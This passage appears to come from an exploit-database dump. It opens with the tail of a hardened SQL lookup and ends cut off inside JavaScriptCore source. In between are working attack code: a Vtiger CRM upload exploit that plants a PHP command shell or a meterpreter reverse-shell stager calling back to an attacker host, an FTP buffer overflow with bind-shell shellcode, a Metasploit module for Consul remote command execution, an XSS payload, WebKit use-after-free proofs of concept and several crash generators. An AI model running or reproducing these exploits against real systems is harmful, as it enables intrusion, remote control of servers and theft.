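    """Hardened equivalent of the $wpdb->get_row() call: validated ints bound as parameters.

    A table name cannot be bound, so the prefix is checked against an identifier
    pattern; row and column travel as parameters, never as SQL text.
    """
    if not re.fullmatch(r"[A-Za-z0-9_]+", table_prefix):
        raise ValueError("bad table prefix")
    row, col = parse_placement(selected_place)
    sql = f"select id from {table_prefix}adicons where adRow=? and adCol=?"
    return conn.execute(sql, (row, col)).fetchone()


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the wp_adicons table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table wp_adicons (id integer primary key, adRow integer, adCol integer)")
    conn.executemany("insert into wp_adicons values (?, ?, ?)", [(7, 1, 2), (8, 3, 4)])
    conn.commit()
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print("valid lookup 1_2 ->", lookup_adicon(conn, "wp_", "1_2"))
    print("payload accepted? ", is_valid_placement(ADVISORY_PAYLOAD))
    print("what concatenation would send:", build_vulnerable_sql("wp_", ADVISORY_PAYLOAD))
```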
            
# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution
# Date: 2018-12-27
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download
# Version: v7.1.0
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : Vtiger CRM enables sales, support, and marketing teams to
# organize and collaborate to measurably improve customer experiences and business outcomes.

# Description : The logo upload field of this application accepts files with the "php3" extension.
# The uploaded file must still be in PNG format and sized 150X40.
# PHP code can be placed in the image source; once the file is given the "php3" extension, the embedded PHP code runs.
# PHP code can therefore be executed using "<? ?>" tags inside a PNG-format file.
# ==================================================================
# I have exploited this in 2 different ways.
# The first uploads a basic PHP shell and lets you control it through the console.
# The second uploads the PHP meterpreter payload to the target site and lets you set up this payload.

# PoC:

#!/usr/bin/python
 
import mechanize, sys, cookielib, requests
import colorama, urllib, re, random
from colorama import Fore

def bannerche():
    print '''
 @-------------------------------------------------------------@
 |       Vtiger CRM 7.1.0 - Remote Code Execution Exploit      |
 |              Vulnerability discovered by AkkuS              |
 |               My Blog - https://pentest.com.tr              |
 @-------------------------------------------------------------@
          '''
bannerche()
 
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <RHOST>"
    exit(0)
 
rhost = sys.argv[1]
UserName = str(raw_input("User Name: ")) # Administrator Username Input
Password = str(raw_input("Password: "))  # Administrator Password Input
 
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()                 # set cookies
br.set_handle_robots(False)
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
 
br.open("http://"+rhost+"/")             # User Access Login
assert br.viewing_html()
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()
 
title = br.title()
if title == "Dashboard":                 # Access control
   print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
   print (Fore.GREEN + "+ [*] Login successful")
else:
   print (Fore.RED + "+ [*] User information is incorrect.")
   sys.exit()
##
# Introducing Cookie and CSRF token information
##
check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj)

doc = check.text

finder = re.findall(r'csrfMagicToken = ".*";', doc)
csrf = finder[0].replace('csrfMagicToken = ', '').replace('"','').replace(';var csrfMagicName = __vtrftk;','').strip()
csrf_to_data = str(csrf)
print(Fore.YELLOW + "+ [*] Token = " + csrf_to_data)

x = br._ua_handlers['_cookies'].cookiejar
c = str(x)

sonuc = re.findall(r"([a-fA-F\d]{32})", c)
g = sonuc[0]
v = str(g)
print (Fore.YELLOW + "+ [*] PHPSESSID = " + v)
##
# Random value fetching
##

boundary = ''.join(str(random.randint(0,9)) for _ in xrange(29))
filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"

##
# EXPLOIT
##
post_cookie = {"PHPSESSID": v}
post_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                 "Accept-Language": "en-US,en;q=0.5",
                 "Connection": "close",
                 "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+""}
Basic_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 
9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"

print (Fore.BLUE + "+ [*] Select shell type:")
print (Fore.YELLOW +"- [*] 1 - Basic Shell")
print ("- [*] 2 - Meterpreter Shell")
choose = int(raw_input("- [*] Enter a number (1 or 2) : "))

if choose == 1:
    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data)
    if Basic.status_code == 200:
       print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
       print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]")
    while True:
          shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"")
          if shellctrl.status_code == 200:
             Command = str(raw_input(Fore.WHITE + "shell> "))
             URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"")
             print URL.text
          else:
             print (Fore.RED + "+ [X] Unable to upload or access the shell")
             sys.exit()  

elif choose == 2:
    print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.")
    print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload")
    print(Fore.YELLOW + "+ [*] Enter metasploit handler settings.")

    lhost = str(raw_input(Fore.WHITE + "LHOST : "))
    lport = str(raw_input(Fore.WHITE + "LPORT : "))
   
    Meter_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?=error_reporting(0); $ip = '"+lhost+"'; $port = "+lport+"; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); 
die();?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"
   
    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Meter_data)
    while True:
          payload = requests.get("http://"+rhost+"/test/logo/"+filename+"")
          print("+ [*] Check your Metasploit Framework console")
          if payload.status_code == 200:    
             print (Fore.GREEN + "+ [*] Payload uploaded and executed!")
           
          else:
             print (Fore.RED + "+ [X] Unable to upload and run the payload")
          sys.exit()
else:
    print("Invalid input!")
# end


            
# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.nsauditor.com
# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: ShareAlarmPro 2.1.4
# Tested on: Windows 7 SP1 x86

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 5000

payload = buffer
try:
    f = open("PoC.txt", "w")
    print("[+] Creating %s bytes payload..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
            
# Exploit Title: NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
# Author: Luis Martinez
# Date: 2018-12-27
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Tested Version: 1.6.5.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python NBMonitor_1.6.5.0.py
# 2.- Open NBMonitor_1.6.5.0.txt and copy content to clipboard
# 3.- Open NBMonitor
# 4.- Register -> Enter Registration Code
# 5.- Paste ClipBoard on "Name:"
# 6.- Key: -> 1
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 276
f = open ("NBMonitor_1.6.5.0.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.nsauditor.com
# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: NetShareWatcher 1.5.8
# Tested on: Windows 7 SP1 x86
# Other software from the vendor affected 
# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 5256

payload = buffer
try:
    f = open("PoC.txt", "w")
    print("[+] Creating %s bytes payload..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
            
# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
# Date: 2018-12-30
# Exploit Author: Achilles
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Tested Version: 8.0.7 (64-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : EZ_CD_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of EVIL.txt into the field: 'Key'
# 5.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
            
# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
# Date: 2018-12-25
# Exploit Author: WangDudu
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Software Link: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE: CVE-2018-20448

# The "Database name" parameter of /install/index.php is vulnerable to reflected XSS.
# 1. The database name, username and password must be correct.
# 2. You can use the following payload:

<script>alert(1)</script>
            
<!--
void AbstractValue::set(Graph& graph, RegisteredStructure structure)
{
    RELEASE_ASSERT(structure);
    
    m_structure = structure;

    m_arrayModes = asArrayModes(structure->indexingType());
    m_type = speculationFromStructure(structure.get());
    m_value = JSValue();
    
    checkConsistency();
    assertIsRegistered(graph);
}

It computes m_arrayModes from structure->indexingType() instead of structure->indexingMode(). Since structure->indexingType() masks out the CopyOnWrite flag, which indicates that the array's butterfly is immutable and needs copy-on-write, wrong information about the array can be propagated. As a result, it becomes possible to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. This can lead to a UaF, as writing into an immutable butterfly can be used to bypass write barriers.

I also noticed that most of the calls to asArrayModes use structure->indexingType(). I think those should be fixed too.

PoC:
-->

// ./jsc --useConcurrentJIT=false ~/test.js

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);  // This inlinee is for having checkArray not take the paths using the structure comparison.
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 100; i++) {
        getImmutableArrayOrSet(false, {});
    }

    let arr = getImmutableArrayOrSet(true);
    print(arr[0] === 1);
}

main();

PoC 2 (UaF):
<script>

function sleep(ms) {
    let s = new Date();
    while (new Date() - s < ms) {

    }
}

function mark() {
    for (let i = 0; i < 40; i++) {
        new ArrayBuffer(1024 * 1024 * 1);
    }
}

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 10000; i++)
        getImmutableArrayOrSet(false, {});

    sleep(500);

    let arr = getImmutableArrayOrSet(true);

    mark();
    getImmutableArrayOrSet(false, []);
    mark();

    setTimeout(() => {
        try {
            alert(arr[0]);
        } catch (e) {
            alert(e);
        }
    }, 200);
}

main();

</script>
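Added illustration, not from the report above: a Python model of the masking step the report blames, showing that an array-mode set built from indexingType() cannot tell a CoW array from an ordinary one, while one built from indexingMode() can. The bit values are my reading of JSC's IndexingType.h, and the `may_alias_copy_on_write` predicate stands in for the later phases that trust m_arrayModes; both are assumptions.

```python
# Constants modelled after JSC's IndexingType.h (assumed values; the masking
# relationship between them is the point, not the exact numbers).
IS_ARRAY = 0x01
INT32_SHAPE = 0x04
COPY_ON_WRITE = 0x20
INDEXING_TYPE_MASK = 0x1F                               # kept by indexingType()
INDEXING_MODE_MASK = INDEXING_TYPE_MASK | COPY_ON_WRITE  # kept by indexingMode()

ARRAY_WITH_INT32 = IS_ARRAY | INT32_SHAPE
COPY_ON_WRITE_ARRAY_WITH_INT32 = ARRAY_WITH_INT32 | COPY_ON_WRITE


def indexing_type(mode):
    """Mirror of Structure::indexingType(): the CoW flag is masked out."""
    return mode & INDEXING_TYPE_MASK


def indexing_mode(mode):
    """Mirror of Structure::indexingMode(): the CoW flag survives."""
    return mode & INDEXING_MODE_MASK


def as_array_modes(indexing):
    """ArrayModes is a bit set with one bit per indexing mode value."""
    return 1 << indexing


def abstract_array_modes(structure_mode, fixed):
    """What AbstractValue::set records as m_arrayModes for one structure.

    fixed=False reproduces the code quoted in the report (indexingType);
    fixed=True applies the change the report asks for (indexingMode).
    """
    key = indexing_mode(structure_mode) if fixed else indexing_type(structure_mode)
    return as_array_modes(key)


def may_alias_copy_on_write(array_modes):
    """Stand-in for a later phase that trusts m_arrayModes: does the set still
    contain any mode carrying the CopyOnWrite bit? If not, the compiler is
    entitled to treat the butterfly as privately owned before a store."""
    return any(array_modes & as_array_modes(m)
               for m in range(INDEXING_MODE_MASK + 1)
               if m & COPY_ON_WRITE)


def store_is_safe_to_skip_cow_check(structure_mode, fixed):
    """The question effectively asked before emitting arr[0] = value."""
    return not may_alias_copy_on_write(abstract_array_modes(structure_mode, fixed))


if __name__ == "__main__":
    # The [1] literal in the PoC: a CoW Int32 array over a JSImmutableButterfly.
    cow = COPY_ON_WRITE_ARRAY_WITH_INT32
    print("buggy: skip CoW check ->", store_is_safe_to_skip_cow_check(cow, fixed=False))  # True (wrong)
    print("fixed: skip CoW check ->", store_is_safe_to_skip_cow_check(cow, fixed=True))   # False
```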
            
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip 
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python

import socket

IP = '192.168.43.28'
port = 21

buf =  ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"

evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 +  buf + "D"*10425

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((IP, port))
        s.listen(20)
        print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send(evil + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')
            
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-12-27
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested Version: 3.0.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python NetworkSleuth_3.0.0.0.py
# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard
# 3.- Open NetworkSleuth
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 276
f = open ("NetworkSleuth_3.0.0.0.txt", "w")
f.write(buffer)
f.close()
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Services API",
      'Description'    => %q{
        This module exploits Hashicorp Consul's services API to gain remote command
        execution on Consul nodes.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
          'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 11 2018'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end

  def check
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, '/v1/agent/self'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error 'Unexpected reply'
      return CheckCode::Safe
    end

    agent_info = JSON.parse(res.body)

    if agent_info["Config"]["EnableScriptChecks"] == true ||
       agent_info["DebugConfig"]["EnableScriptChecks"] == true ||
       agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  rescue JSON::ParserError
    vprint_error 'Failed to parse JSON output.'
    return CheckCode::Unknown
  end

  def execute_command(cmd, opts = {})
    uri = target_uri.path
    service_name = Rex::Text.rand_text_alpha(5..10)
    print_status("Creating service '#{service_name}'")

    # NOTE: Timeout defines how much time the check script will run until
    # getting killed. Arbitrarily set to one day for now.
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {
        :ID => "#{service_name}",
        :Name => "#{service_name}",
        :Address => "127.0.0.1",
        :Port => 80,
        :check => {
          :script => "#{cmd}",
          :Args => ["sh", "-c", "#{cmd}"],
          :interval => "10s",
          :Timeout => "86400s"
        }
      }.to_json
    })
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'An error occurred when contacting the Consul API.')
    end
    print_status("Service '#{service_name}' successfully created.")
    print_status("Waiting for service '#{service_name}' script to trigger")
    sleep(12)
    print_status("Removing service '#{service_name}'")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(
        uri,
        "v1/agent/service/deregister/#{service_name}"
      ),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })
    if res && res.code != 200
      fail_with(Failure::UnexpectedReply,
        'An error occurred when contacting the Consul API.'
      )
    end
  end

  def exploit
    execute_cmdstager()
  end
end
            
/*
bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
{
    unsigned oldLength = storage->length();
    RELEASE_ASSERT(count <= oldLength);
    
    // If the array contains holes or is otherwise in an abnormal state,
    // use the generic algorithm in ArrayPrototype.
    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) 
        || hasSparseMap() 
        || shouldUseSlowPut(indexingType())) {
        return false;
    }

    if (!oldLength)
        return true;
    
    unsigned length = oldLength - count;
    
    storage->m_numValuesInVector -= count;
    storage->setLength(length);


